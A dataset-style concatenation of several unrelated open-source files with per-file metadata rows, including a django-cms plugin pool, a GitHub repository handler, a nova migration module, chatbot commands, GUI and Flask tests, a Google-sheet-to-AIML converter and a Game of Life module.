"HostedZoneId": (str, False),
"ValidationDomain": (str, False),
}
class Certificate(AWSObject):
resource_type = "AWS::CertificateManager::Certificate"
props = {
"CertificateAuthorityArn": (str, False),
"CertificateTransparencyLoggingPreference": (str, False),
"DomainName": (str, True),
"DomainValidationOptions": ([DomainValidationOption], False),
"SubjectAlternativeNames": ([str], False),
"Tags": ((Tags, list), False),
"ValidationMethod": (str, False),
}
| bsd-2-clause | -346,566,488,791,936,300 | 24.428571 | 71 | 0.658106 | false |
divio/django-cms | cms/plugin_pool.py | 1 | 8752 | from operator import attrgetter
from django.core.exceptions import ImproperlyConfigured
from django.urls import re_path, include
from django.template.defaultfilters import slugify
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils.module_loading import autodiscover_modules
from django.utils.translation import get_language, deactivate_all, activate
from django.template import TemplateDoesNotExist, TemplateSyntaxError
from cms.exceptions import PluginAlreadyRegistered, PluginNotRegistered
from cms.plugin_base import CMSPluginBase
from cms.utils.conf import get_cms_setting
from cms.utils.helpers import normalize_name
class PluginPool:
def __init__(self):
self.plugins = {}
self.discovered = False
def _clear_cached(self):
if 'registered_plugins' in self.__dict__:
del self.__dict__['registered_plugins']
if 'plugins_with_extra_menu' in self.__dict__:
del self.__dict__['plugins_with_extra_menu']
if 'plugins_with_extra_placeholder_menu' in self.__dict__:
del self.__dict__['plugins_with_extra_placeholder_menu']
def discover_plugins(self):
if self.discovered:
return
from cms.cache import invalidate_cms_page_cache
if get_cms_setting("PAGE_CACHE"):
invalidate_cms_page_cache()
autodiscover_modules('cms_plugins')
self.discovered = True
def clear(self):
self.discovered = False
self.plugins = {}
self._clear_cached()
def validate_templates(self, plugin=None):
"""
        Plugin templates are validated at this stage
"""
if plugin:
plugins = [plugin]
else:
plugins = self.plugins.values()
for plugin in plugins:
if (plugin.render_plugin and not type(plugin.render_plugin) == property
or hasattr(plugin.model, 'render_template')
or hasattr(plugin, 'get_render_template')):
if (plugin.render_template is None and
not hasattr(plugin, 'get_render_template')):
raise ImproperlyConfigured(
"CMS Plugins must define a render template, "
"a get_render_template method or "
"set render_plugin=False: %s" % plugin
)
# If plugin class defines get_render_template we cannot
# statically check for valid template file as it depends
# on plugin configuration and context.
                # We cannot prevent a developer from shooting their users in the foot
elif not hasattr(plugin, 'get_render_template'):
from django.template import loader
template = plugin.render_template
if isinstance(template, str) and template:
try:
loader.get_template(template)
except TemplateDoesNotExist as e:
# Note that the template loader will throw
# TemplateDoesNotExist if the plugin's render_template
# does in fact exist, but it includes a template that
# doesn't.
if str(e) == template:
raise ImproperlyConfigured(
"CMS Plugins must define a render template (%s) that exists: %s"
% (plugin, template)
)
else:
pass
except TemplateSyntaxError:
pass
else:
if plugin.allow_children:
raise ImproperlyConfigured(
"CMS Plugins can not define render_plugin=False and allow_children=True: %s"
% plugin
)
def register_plugin(self, plugin):
"""
Registers the given plugin(s).
        Static sanity checks are also performed.
If a plugin is already registered, this will raise PluginAlreadyRegistered.
"""
if not issubclass(plugin, CMSPluginBase):
raise ImproperlyConfigured(
"CMS Plugins must be subclasses of CMSPluginBase, %r is not."
% plugin
)
plugin_name = plugin.__name__
if plugin_name in self.plugins:
raise PluginAlreadyRegistered(
"Cannot register %r, a plugin with this name (%r) is already "
"registered." % (plugin, plugin_name)
)
plugin.value = plugin_name
self.plugins[plugin_name] = plugin
return plugin
def unregister_plugin(self, plugin):
"""
Unregisters the given plugin(s).
If a plugin isn't already registered, this will raise PluginNotRegistered.
"""
plugin_name = plugin.__name__
if plugin_name not in self.plugins:
raise PluginNotRegistered(
'The plugin %r is not registered' % plugin
)
del self.plugins[plugin_name]
def get_all_plugins(self, placeholder=None, page=None, setting_key="plugins", include_page_only=True):
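        # Start from every registered plugin, then narrow the set down using the
        # placeholder/template configuration (allowed, excluded, parent rules).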
from cms.utils.placeholder import get_placeholder_conf
self.discover_plugins()
plugins = sorted(self.plugins.values(), key=attrgetter('name'))
template = page.get_template() if page else None
allowed_plugins = get_placeholder_conf(
setting_key,
placeholder,
template,
) or ()
excluded_plugins = get_placeholder_conf(
'excluded_plugins',
placeholder,
template,
) or ()
if not include_page_only:
# Filters out any plugin marked as page only because
# the include_page_only flag has been set to False
plugins = (plugin for plugin in plugins if not plugin.page_only)
if allowed_plugins:
# Check that plugins are in the list of the allowed ones
plugins = (plugin for plugin in plugins if plugin.__name__ in allowed_plugins)
if excluded_plugins:
# Check that plugins are not in the list of the excluded ones
plugins = (plugin for plugin in plugins if plugin.__name__ not in excluded_plugins)
if placeholder:
# Filters out any plugin that requires a parent or has set parent classes
plugins = (plugin for plugin in plugins
if not plugin.requires_parent_plugin(placeholder, page))
return sorted(plugins, key=attrgetter('module'))
def get_text_enabled_plugins(self, placeholder, page):
plugins = set(self.get_all_plugins(placeholder, page))
plugins.update(self.get_all_plugins(placeholder, page, 'text_only_plugins'))
return sorted((p for p in plugins if p.text_enabled),
key=attrgetter('module', 'name'))
def get_plugin(self, name):
"""
Retrieve a plugin from the cache.
"""
self.discover_plugins()
return self.plugins[name]
def get_patterns(self):
self.discover_plugins()
# We want untranslated name of the plugin for its slug so we deactivate translation
lang = get_language()
deactivate_all()
try:
url_patterns = []
for plugin in self.registered_plugins:
p = plugin()
slug = slugify(force_text(normalize_name(p.__class__.__name__)))
url_patterns += [
re_path(r'^plugin/%s/' % (slug,), include(p.plugin_urls)),
]
finally:
# Reactivate translation
activate(lang)
return url_patterns
def get_system_plugins(self):
self.discover_plugins()
return [plugin.__name__ for plugin in self.plugins.values() if plugin.system]
@cached_property
def registered_plugins(self):
return self.get_all_plugins()
@cached_property
def plugins_with_extra_menu(self):
plugin_classes = [cls for cls in self.registered_plugins
if cls._has_extra_plugin_menu_items]
return plugin_classes
@cached_property
def plugins_with_extra_placeholder_menu(self):
plugin_classes = [cls for cls in self.registered_plugins
if cls._has_extra_placeholder_menu_items]
return plugin_classes
plugin_pool = PluginPool()
| bsd-3-clause | 4,728,667,927,602,387,000 | 36.887446 | 106 | 0.573812 | false |
QLGu/djangopackages | package/repos/github.py | 2 | 2521 | from time import sleep
from django.conf import settings
from django.utils import timezone
from github3 import GitHub, login
import requests
from base_handler import BaseHandler
from package.utils import uniquer
class GitHubHandler(BaseHandler):
title = "Github"
url_regex = '(http|https|git)://github.com/'
url = 'https://github.com'
repo_regex = r'(?:http|https|git)://github.com/[^/]*/([^/]*)/{0,1}'
slug_regex = repo_regex
def __init__(self):
if settings.GITHUB_TOKEN:
self.github = login(token=settings.GITHUB_TOKEN)
else:
self.github = GitHub()
def manage_ratelimit(self):
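        # Back off until GitHub's rate-limit window has enough requests left.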
while self.github.ratelimit_remaining < 10:
sleep(1)
def _get_repo(self, package):
repo_name = package.repo_name()
if repo_name.endswith("/"):
repo_name = repo_name[:-1]
try:
username, repo_name = package.repo_name().split('/')
except ValueError:
return None
return self.github.repository(username, repo_name)
def fetch_metadata(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
package.repo_watchers = repo.watchers
package.repo_forks = repo.forks
package.repo_description = repo.description
contributors = []
for contributor in repo.iter_contributors():
contributors.append(contributor.login)
self.manage_ratelimit()
if contributors:
package.participants = ','.join(uniquer(contributors))
return package
def fetch_commits(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
from package.models import Commit # Added here to avoid circular imports
for commit in repo.iter_commits():
self.manage_ratelimit()
try:
commit_record, created = Commit.objects.get_or_create(
package=package,
commit_date=commit.commit.committer['date']
)
if not created:
break
except Commit.MultipleObjectsReturned:
continue
# If the commit record already exists, it means we are at the end of the
# list we want to import
package.save()
return package
repo_handler = GitHubHandler()
| mit | 5,148,200,768,411,809,000 | 27.977011 | 84 | 0.589052 | false |
gyang/nova | nova/db/sqlalchemy/migration.py | 1 | 4780 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import distutils.version as dist_version
import os
import sys
from nova.db.sqlalchemy.session import get_engine
from nova import exception
from nova import flags
import sqlalchemy
import migrate
from migrate.versioning import util as migrate_util
@migrate_util.decorator
def patched_with_engine(f, *a, **kw):
url = a[0]
engine = migrate_util.construct_engine(url, **kw)
try:
kw['engine'] = engine
return f(*a, **kw)
finally:
if isinstance(engine, migrate_util.Engine) and engine is not url:
migrate_util.log.debug('Disposing SQLAlchemy engine %s', engine)
engine.dispose()
# TODO(jkoelker) When migrate 0.7.3 is released and nova depends
# on that version or higher, this can be removed
MIN_PKG_VERSION = dist_version.StrictVersion('0.7.3')
if (not hasattr(migrate, '__version__') or
dist_version.StrictVersion(migrate.__version__) < MIN_PKG_VERSION):
migrate_util.with_engine = patched_with_engine
# NOTE(jkoelker) Delay importing migrate until we are patched
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
try:
from migrate.versioning import exceptions as versioning_exceptions
except ImportError:
try:
# python-migration changed location of exceptions after 1.6.3
# See LP Bug #717467
from migrate import exceptions as versioning_exceptions
except ImportError:
sys.exit(_("python-migrate is not installed. Exiting."))
FLAGS = flags.FLAGS
_REPOSITORY = None
def db_sync(version=None):
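    # Migrate the schema up or down to `version`; defaults to the latest revision.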
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.Error(_("version should be an integer"))
current_version = db_version()
repository = _find_migrate_repo()
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
def db_version():
repository = _find_migrate_repo()
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
# If we aren't version controlled we may already have the database
# in the state from before we started version control, check for that
# and set up version_control appropriately
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
try:
for table in ('auth_tokens', 'zones', 'export_devices',
'fixed_ips', 'floating_ips', 'instances',
'key_pairs', 'networks', 'projects', 'quotas',
'security_group_instance_association',
'security_group_rules', 'security_groups',
'services', 'migrations',
'users', 'user_project_association',
'user_project_role_association',
'user_role_association',
'virtual_storage_arrays',
'volumes', 'volume_metadata',
'volume_types', 'volume_type_extra_specs'):
assert table in meta.tables
return db_version_control(1)
except AssertionError:
return db_version_control(0)
def db_version_control(version=None):
repository = _find_migrate_repo()
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
global _REPOSITORY
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
if _REPOSITORY is None:
_REPOSITORY = Repository(path)
return _REPOSITORY
| apache-2.0 | 6,008,023,316,838,071,000 | 34.93985 | 78 | 0.64477 | false |
Mego/DataBot | SE-Chatbot/botbuiltins/utils.py | 1 | 4260 | from Module import Command
from datetime import datetime
from requests import HTTPError
import re
import os
from ChatExchange3.chatexchange3.messages import Message
def command_alive(cmd, bot, args, msg, event):
return "Yes, I'm alive."
def command_utc(cmd, bot, args, msg, event):
return datetime.utcnow().ctime()
def command_listcommands(cmd, bot, args, msg, event):
if len(args) == 0:
return "Commands:%s%s" % (os.linesep, ', '.join([command.name for command in bot.modules.list_commands()]))
elif len(args) == 1:
module = bot.modules.find_module_by_name(args[0])
if module is None:
return "That module does not exist, or it is disabled."
cmds = module.list_commands()
if len(cmds) == 0:
return "No commands found in `%s`." % args[0]
return "Commands in `%s`:%s%s" % (args[0], os.linesep, ', '.join([command.name for command in cmds]))
else:
return "0 or 1 argument(s) expected."
#def parse_cat_command(cmd):
# if cmd.startswith("cat "):
# return [cmd[4:]]
# else:
# return False
def command_help(cmd, bot, args, msg, event):
if len(args) == 0:
return "I'm $BOT_NAME, $OWNER_NAME's chatbot. You can find the source code [on GitHub]($GITHUB). You can get a list of all commands by running `$PREFIXlistcommands`, or you can run `$PREFIXhelp command` to learn more about a specific command."
return bot.modules.get_help(args[0]) or "The command you want to look up does not exist."
#def command_cat(cmd, bot, args, msg, event):
# return args[0]
def command_read(cmd, bot, args, msg, event):
if len(args) == 0:
return "No message id/link supplied."
else:
message = []
for msg_id in args:
if msg_id.isdigit():
m_id = int(msg_id)
elif msg_id.split("#")[-1].isdigit():
m_id = int(msg_id.split("#")[-1])
elif msg_id.split("/")[-1].isdigit():
m_id = int(msg_id.split("/")[-1])
else:
return msg_id + " is not a valid message id/link."
try:
message += [re.sub(r'^:[0-9]+ ', '', Message(m_id, bot.client).content_source)]
except HTTPError:
return msg_id + ": message not found."
return ' '.join(message)
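# command_read accepts raw message ids ("12345"), transcript anchors ending
# in "#12345", or message links ending in "/12345".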
#def command_getcurrentusers(cmd, bot, args, msg, event):
# try:
# users = bot.room.get_current_user_names()
# except HTTPError:
# return "HTTPError when executing the command; please try again."
# except ConnectionError:
# return "ConnectionError when executing the command; please try again."
# users = [x.encode('ascii', errors='replace').decode('unicode_escape') for x in users]
# if len(args) > 0 and args[0] == "pingformat":
# users = [x.replace(" ", "") for x in users]
# return " ".join(users)
# return ", ".join(users)
#def command_ping(cmd, bot, args, msg, event):
# if len(args) == 0:
# return "No arguments supplied"
# else:
# return " ".join(["@" + arg for arg in args])
commands = [Command('alive', command_alive, "A command to see whether the bot is there. Syntax: `$PREFIXalive`", False, False),
Command('utc', command_utc, "Shows the current UTC time. Syntax: `$PREFIXutc`", False, False),
Command('listcommands', command_listcommands, "Returns a list of all commands. Syntax: `$PREFIXlistcommands`", False, False),
Command('help', command_help, "Shows information about the chat bot, or about a specific command. Syntax: `$PREFIXhelp [ command ]`", False, False),
#Command('cat', command_cat, "Repeats what you said back at you. Syntax: `$PREFIXcat something`", False, False, parse_cat_command, None, None, None),
Command('read', command_read, "Reads a post to you. Syntax: `$PREFIXread [ message_id ] ...`", False, False),
#Command('getcurrentusers', command_getcurrentusers, "Shows the current users of a room. Syntax: `$PREFIXgetcurrentusers`", False, False),
#Command('ping', command_ping, "Pings a list of users for you. Syntax: `$PREFIXping user [...]`", False, False, None, None, None, None)
]
module_name = "utils"
| mit | 6,625,686,474,243,252,000 | 42.469388 | 251 | 0.609624 | false |
qspin/qtaste | demo/TestSuites/PlayBack/PopupControl/TestScript.py | 1 | 3497 | # coding=utf-8
##
# PopupControl.
# <p>
# Description of the test.
#
# @data INSTANCE_ID [String] instance id
##
from qtaste import *
import time
javaguiMI = testAPI.getJavaGUI(INSTANCE_ID=testData.getValue("JAVAGUI_INSTANCE_NAME"))
subtitler = testAPI.getSubtitler()
def displayFirstPopup():
"""
@step Click on the button to create the first popup
    @expected a popup exists
"""
javaguiMI.selectTabId("TABBED_PANE", "DIALOG_PANEL")
subtitler.setSubtitle("Click on the <span style=\"color:red;\">Start</span> button", 1.5)
javaguiMI.clickOnButton("START_BUTTON")
time.sleep(1)
if javaguiMI.isPopupDisplayed() == False:
testAPI.stopTest(Status.FAIL, "No popup created.")
def setPopupValue():
"""
    @step Set the popup value and click on OK
    @expected If the value is numeric another popup is opened, otherwise no popup is opened.
"""
popupValue = testData.getValue("POPUP_VALUE");
subtitler.setSubtitle("Set the value '" + popupValue +"' and click on the <span style=\"color:red;\">OK</span> button", 1.5)
javaguiMI.setPopupValue(popupValue)
javaguiMI.clickOnPopupButton("OK");
time.sleep(1)
shouldHavePopup = testData.getBooleanValue("IS_POPUP_VALUE_NUMERIC");
if javaguiMI.isPopupDisplayed() != shouldHavePopup:
if shouldHavePopup:
testAPI.stopTest(Status.FAIL, "Popup should have been created.")
else:
testAPI.stopTest(Status.FAIL, "Popup should not have been created.")
def valueValidation():
"""
@step Check the displayed message and click on OK
@expected the message contains the correct value.
"""
popupValue = testData.getValue("POPUP_VALUE");
expectedMessage = "Are you sure you want to display " + popupValue + " popup(s)?"
subtitler.setSubtitle("Check the popup message is '" + expectedMessage + "'")
time.sleep(2)
currentMessage = javaguiMI.getPopupText()
if expectedMessage != currentMessage:
testAPI.stopTest(Status.FAIL, "The message is not the expected one. get '" + currentMessage + "' but expects '" + expectedMessage +"'.")
if testData.getBooleanValue("CONFIRM"):
subtitler.setSubtitle("Click on the <span style=\"color:red;\">Yes</span> button")
time.sleep(1)
javaguiMI.clickOnPopupButton("Yes")
else:
subtitler.setSubtitle("Click on the <span style=\"color:red;\">No</span> button", 1.5)
time.sleep(1)
javaguiMI.clickOnPopupButton("No")
def countPopupAndClose():
"""
    @step Check the number of displayed popups and close them.
    @expected @POPUP_VALUE popup(s) are displayed.
"""
if testData.getBooleanValue("CONFIRM"):
popupValue = testData.getIntValue("POPUP_VALUE")
else:
popupValue = 0
time.sleep(1)
subtitler.setSubtitle("Check the number of opened popup")
time.sleep(1)
current = len(javaguiMI.getAllPopupText())
if current != popupValue:
testAPI.stopTest(Status.FAIL, str(popupValue) + " popup(s) expected but only " + str(current) + " popup(s) displayed!")
i = 0
while len(javaguiMI.getAllPopupText()) > 0:
subtitler.setSubtitle("Click on the <span style=\"color:red;\">OK</span> button", 1.5)
javaguiMI.clickOnPopupButton("OK")
time.sleep(1)
i += 1
doStep(displayFirstPopup)
doStep(setPopupValue)
if testData.getBooleanValue("IS_POPUP_VALUE_NUMERIC"):
doStep(valueValidation)
countPopupAndClose()
| lgpl-3.0 | -772,310,992,440,049,000 | 33.623762 | 144 | 0.668573 | false |
ONSdigital/ras-frontstage | tests/integration/views/surveys/test_download_survey.py | 1 | 4001 | import json
import unittest
from unittest.mock import patch
import requests_mock
from flask import request
from frontstage import app
from tests.integration.mocked_services import (
business_party,
case,
collection_instrument_seft,
encoded_jwt_token,
survey,
url_banner_api,
)
@requests_mock.mock()
class TestDownloadSurvey(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
self.app.set_cookie("localhost", "authorization", "session_key")
self.headers = {
"Authorization": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoicmluZ3JhbUBub3d3aGVyZS5jb20iLCJ1c2VyX3Njb3BlcyI6WyJjaS5yZWFkIiwiY2kud3JpdGUiXX0.se0BJtNksVtk14aqjp7SvnXzRbEKoqXb8Q5U9VVdy54" # NOQA
}
self.patcher = patch("redis.StrictRedis.get", return_value=encoded_jwt_token)
self.patcher.start()
def tearDown(self):
self.patcher.stop()
@patch("frontstage.controllers.collection_instrument_controller.download_collection_instrument")
@patch("frontstage.controllers.party_controller.is_respondent_enrolled")
@patch("frontstage.controllers.case_controller.get_case_by_case_id")
def test_download_survey_success(self, mock_request, get_case_by_id, _, download_collection_instrument):
mock_request.get(url_banner_api, status_code=404)
str = json.dumps(collection_instrument_seft)
binary = " ".join(format(ord(letter), "b") for letter in str)
get_case_by_id.return_value = case
headers = {"Content-type": "application/json", "Content-Length": "5962"}
download_collection_instrument.return_value = binary, headers
response = self.app.get(
f'/surveys/download-survey?case_id={case["id"]}&business_party_id={business_party["id"]}'
f'&survey_short_name={survey["shortName"]}'
)
self.assertEqual(response.status_code, 200)
def test_enforces_secure_headers(self, mock_request):
mock_request.get(url_banner_api, status_code=404)
with app.test_client() as client:
headers = client.get(
"/", headers={"X-Forwarded-Proto": "https"} # set protocol so that talisman sets HSTS headers
).headers
self.assertEqual("no-cache, no-store, must-revalidate", headers["Cache-Control"])
self.assertEqual("no-cache", headers["Pragma"])
self.assertEqual("max-age=31536000; includeSubDomains", headers["Strict-Transport-Security"])
self.assertEqual("DENY", headers["X-Frame-Options"])
self.assertEqual("1; mode=block", headers["X-Xss-Protection"])
self.assertEqual("nosniff", headers["X-Content-Type-Options"])
csp_policy_parts = headers["Content-Security-Policy"].split("; ")
self.assertIn("default-src 'self' https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn("font-src 'self' data: https://fonts.gstatic.com https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn(
"script-src 'self' https://www.googletagmanager.com https://cdn.ons.gov.uk 'nonce-{}'".format(
request.csp_nonce
),
csp_policy_parts,
)
# TODO: fix assertion error
# self.assertIn(
# "connect-src 'self' https://www.googletagmanager.com https://tagmanager.google.com https://cdn.ons.gov.uk "
# 'http://localhost:8082 ws://localhost:8082', csp_policy_parts)
self.assertIn(
"img-src 'self' data: https://www.gstatic.com https://www.google-analytics.com "
"https://www.googletagmanager.com https://ssl.gstatic.com https://cdn.ons.gov.uk",
csp_policy_parts,
)
self.assertIn(
"style-src 'self' https://cdn.ons.gov.uk 'unsafe-inline' https://tagmanager.google.com https://fonts.googleapis.com",
csp_policy_parts,
)
| mit | 3,429,505,770,575,708,700 | 44.988506 | 215 | 0.63859 | false |
hansonrobotics/chatbot | src/chatbot/server/gsheet_chatter.py | 1 | 8513 | import os
import sys
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(CWD, '..'))
import aiml
import urllib
import csv
import logging
import glob
from csvUtils import generateAimlFromLongCSV, generateAimlFromSimpleCSV
import xml.etree.ElementTree as ET
logger = logging.getLogger('hr.chatbot.gsheet_chatter')
xmlns = '{http://www.w3.org/2005/Atom}'
def getWorkSheets(skey, dirname='.'):
urlwks = "https://spreadsheets.google.com/feeds/worksheets/<KEY>/public/full"
urlwks = urlwks.replace("<KEY>", skey)
wksData = urllib.urlopen(urlwks).read()
tree = ET.fromstring(wksData)
author = tree.find(xmlns + 'author')
name = author.find(xmlns + 'name').text
email = author.find(xmlns + 'email').text
aiml_files, csv_files = [], []
if not os.path.isdir(dirname):
os.makedirs(dirname)
for entry in tree.findall('{}entry'.format(xmlns)):
aimlFileData = None
csvData = None
title = None
for item in entry.iter():
if item.tag == xmlns + 'link' and item.attrib.get('type') == 'text/csv':
pagelink = item.attrib.get('href')
#pagelink = pagelink.replace('format=csv', 'format=tsv', )
csvData = loadSheetViaURL(pagelink)
aimlFileData = generateAimlFromCSV(csvData)
if item.tag == xmlns + 'title':
title = item.text
filename = os.path.join(
dirname, '{}_{}.aiml'.format(skey, title))
csv_fname = os.path.join(
dirname, '{}_{}.csv'.format(skey, title))
if title == 'question': # skip "question" sheet
continue
if csvData is not None:
with open(csv_fname, 'w') as f:
f.write(csvData)
csv_files.append(csv_fname)
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
aiml_files.append(filename)
return aiml_files, csv_files
# http://stackoverflow.com/questions/11290337/how-to-convert-google-spreadsheets-worksheet-string-id-to-integer-index-gid
def to_gid(worksheet_id):
return int(worksheet_id, 36) ^ 31578
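# e.g. to_gid('od6') == 0, the gid of the default first worksheet.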
def loadSheet(skey, page):
#// REPLACE THIS WITH YOUR URL
logger.debug("PAGE:" + str(page))
logger.debug("GID :" + str(to_gid(str(page))))
urlcsv = "https://docs.google.com/spreadsheets/d/<KEY>/export?format=csv&id=<KEY>&gid=" + \
str(page) # +str(to_gid(str(page)))
urlcsv = urlcsv.replace("<KEY>", skey)
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def loadSheetViaURL(urlcsv):
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def generateAimlFromCSV(csvData, delimiter=','):
lines = csvData.splitlines()
if (len(lines) == 0):
return ""
header = lines[0]
aimlFile = '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
aimlFile += '<aiml>\n'
reader = csv.DictReader(lines, delimiter=delimiter)
for row in reader:
logger.debug(row)
slots = {}
slots['PATTERN'] = "*"
slots['THAT'] = "*"
slots['TEMPLATE'] = ""
slots['TOPIC'] = "*"
slots['REDUCE_TO'] = ""
category = " <category>\n <pattern>XPATTERN</pattern>\n <that>XTHAT</that>\n <template>XTEMPLATEXREDUCE</template>\n </category>\n"
if (('PATTERN' in row) and (row['PATTERN'] != "")):
slots['PATTERN'] = row['PATTERN'].upper()
if (('THAT' in row) and (row['THAT'] != "")):
slots['THAT'] = row['THAT']
if (('TEMPLATE' in row) and (row['TEMPLATE'] != "")):
slots['TEMPLATE'] = row['TEMPLATE'].replace("#Comma", ",")
if (('TOPIC' in row) and (row['TOPIC'] != "")):
slots['TOPIC'] = row['TOPIC']
if (('REDUCE_TO' in row) and (row['REDUCE_TO'] != "")):
slots['REDUCE_TO'] = "<srai>" + row['REDUCE_TO'] + "</srai>"
category = category.replace("XPATTERN", slots['PATTERN'])
category = category.replace("XTHAT", slots['THAT'])
category = category.replace("XTEMPLATE", slots['TEMPLATE'])
category = category.replace("XTOPIC", slots['TOPIC'])
category = category.replace("XREDUCE", slots['REDUCE_TO'])
aimlFile += category
aimlFile += "</aiml>"
return aimlFile
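# Illustrative example: a row with PATTERN="hello *" and TEMPLATE="Hi there!"
# (other columns empty) becomes the AIML category
#   <category> <pattern>HELLO *</pattern> <that>*</that> <template>Hi there!</template> </category>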
def readAndLoadSheets(sheetList, engine):
for sheetKey in sheetList:
aiml_files, _ = getWorkSheets(sheetKey)
for aiml_file in aiml_files:
engine.learn(aiml_file)
# for page in range(0,3):
# csvDat = loadSheet(sheetKey,int(page))
# aimlFileData = generateAimlFromCSV(csvDat)
# if (len(aimlFileData)==0): continue
# filename = sheetKey+"_"+str(page) +".aiml"
# target = open(filename, 'w')
# target.truncate()
# target.write(aimlFileData)
# target.close()
# engine.learn(filename)
# The Kernel object is the public interface to
# the AIML interpreter.
def get_csv_version(csv_file):
# Guessing
with open(csv_file) as f:
header = f.readline().strip()
if sorted(header.split(',')) == sorted(
['Human_says', 'Meaning', 'Robot_says']):
return "3"
elif sorted(header.split(',')) == sorted(
['Type', 'Pattern', 'That', 'Template', 'Source', 'Think', 'Topic']):
return "2"
else:
return "1"
def batch_csv2aiml(csv_dir, aiml_dir, csv_version=None):
"""Convert all the csv files in the csv_dir to aiml files.
csv_version:
1: PATTERN,THAT,TOPIC,TEMPLATE,REDUCE_TO
2: Type,Pattern,That,Template,Source,Think
3: Human_says,Meaning,Robot_says
"""
if not os.path.isdir(aiml_dir):
os.makedirs(aiml_dir)
aiml_files = []
csv_files = []
for csv_file in glob.glob('{}/*.csv'.format(csv_dir)):
filename = os.path.basename(csv_file)
filename = os.path.splitext(filename)[0] + '.aiml'
filename = os.path.join(aiml_dir, filename)
aimlFileData = None
with open(csv_file) as f:
if csv_version is None:
csv_version = get_csv_version(csv_file)
if csv_version == '1':
csvData = f.read()
aimlFileData = generateAimlFromCSV(csvData, ',')
elif csv_version == '2':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromLongCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
elif csv_version == '3':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromSimpleCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
logger.info("Convert {} to {}".format(csv_file, filename))
aiml_files.append(filename)
csv_files.append(csv_file)
return aiml_files, csv_files
if __name__ == '__main__':
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
k = aiml.Kernel()
# **************** CHANGE TO GOOGLE SHEET KEY HERE ***********************
sheetList = {"1Tbro_Kjbby162Rms0GpQswoqhavXOoRe85HVRyEB1NU"}
readAndLoadSheets(sheetList, k)
#csvDat = loadSheet(sheetKey)
# print "CSVDAT"
# print csvDat
#aimlFile = generateAimlFromCSV(csvDat)
# print aimlFile
# Use the 'learn' method to load the contents
# of an AIML file into the Kernel.
# k.learn("std-startup.xml")
# Use the 'respond' method to compute the response
# to a user's input string. respond() returns
# the interpreter's response, which in this case
# we ignore.
# k.respond("load aiml b")
# Loop forever, reading user input from the command
# line and printing responses.
while True:
userin = raw_input("> ")
print "raw response:" + k.respond(userin)
| mit | 3,803,464,178,213,337,600 | 34.619247 | 142 | 0.573828 | false |
BradleyMoore/Game_of_Life | app/life.py | 1 | 2134 | from collections import Counter
import pygame
from constants import BOX, HEIGHT, WIDTH, SCREEN
class Cell(object):
def __init__(self, pos):
self.color = (255,0,0)
self.neighbors = 0
self.neighbor_list = []
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def draw(self):
if self.x < 0 or self.x > WIDTH:
pass
elif self.y < 0 or self.y > HEIGHT:
pass
else:
pygame.draw.rect(SCREEN, self.color, (self.x*BOX, self.y*BOX, BOX, BOX))
def list_neighbors(self):
self.neighbor_list = []
for x in xrange(self.x-1, self.x+2):
for y in xrange(self.y-1, self.y+2):
self.neighbor_list.append((x,y))
self.neighbor_list.remove(self.pos)
return self.neighbor_list
class Pattern(object):
def __init__(self, name, pos):
self.name = name
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def create_pattern(self):
from patterns import patterns
pattern = patterns[self.name]
coordinates = []
for y in xrange(len(pattern)):
for x in xrange(len(pattern[y])):
if pattern[y][x] == 1:
coordinates.append((self.x+x, self.y+y))
return coordinates
def create_life(life, neighbors):
from game import TO_BE_BORN, TO_LIVE
new_life = []
# turn neighbor positions into a list of tuples
neighbor_dict = Counter(neighbors)
neighbor_list = neighbor_dict.items()
life_pos = []
if life != None:
for cell in life:
life_pos.append(cell.pos)
for pos, count in neighbor_list:
# give birth to cells
if count in TO_BE_BORN and pos not in life_pos:
new_life.append(pos)
# cells staying alive
if count in TO_LIVE and pos in life_pos:
new_life.append(pos)
return new_life
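# With Conway's standard rules game.py would define TO_BE_BORN = [3] and
# TO_LIVE = [2, 3]; the exact values used here come from that module.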
def get_neighbors(life):
neighbors = []
if life != None:
for cell in life:
neighbors.extend(cell.list_neighbors())
return neighbors
